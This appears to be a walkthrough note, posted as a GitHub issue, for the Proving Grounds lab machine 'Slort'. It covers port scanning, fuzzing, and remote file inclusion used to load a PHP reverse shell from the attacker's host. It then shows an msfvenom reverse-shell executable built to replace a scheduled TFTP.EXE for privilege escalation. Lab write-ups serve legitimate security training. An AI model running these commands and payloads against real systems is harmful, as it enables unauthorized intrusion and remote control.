search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Slort (Intermediate, Windows, 2020) - RFI, LFI ★ #55

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago

Keypoints:

WDavid404 commented 1 month ago 
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
3306/tcp  open  mysql?        syn-ack ttl 125
| mysql-info: 
|_  MySQL Error: Host '192.168.45.205' is not allowed to connect to this MariaDB server

4443/tcp  open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP

5040/tcp  open  unknown       syn-ack ttl 125

8080/tcp  open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)

49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

21/tcp

anonymous login ---> failed

139/tcp, 445/tcp

enum4linux --> no info smbmap ---> no info

8080/tcp (same as 4443/tcp)

image

/phpinfo.php image image image image

username: rupert

/phpmyadmin --> access denied. image

ffuf -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.170.53:8080/FUZZ -mc 200 --》/site image

When accessing /site, it redirect to "http://192.168.210.53:8080/site/index.php?page=main.php" and this URL may have LFI and RFI issue. image

visiting http://192.168.210.53:8080/site/index.php?page=C:/xampp/htdocs/dashboard/phpinfo.php --> work

visting http://192.168.210.53:8080/site/index.php?page=http://192.168.45.205:3333/test --> work

Let's visit a reverse shell php that located on our kali machine. http://192.168.210.53:8080/site/index.php?page=http://192.168.45.205/php-reverse-shell-IvanSincek.php --> We got a reverse shell image

PE

See c:/ image

in C:/Backup image info.txt -->

Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt

We can try to replace TFTP.EXE file with our reverse shell file [Kali] msfvenom -p windows/shell_reverse_tcp -f exe -o TFTP.exe LHOST=192.168.45.205 LPORT=443 move TFTP.EXE TFTP-bk.EXE upload our fake TFTP.EXE to C:/backup image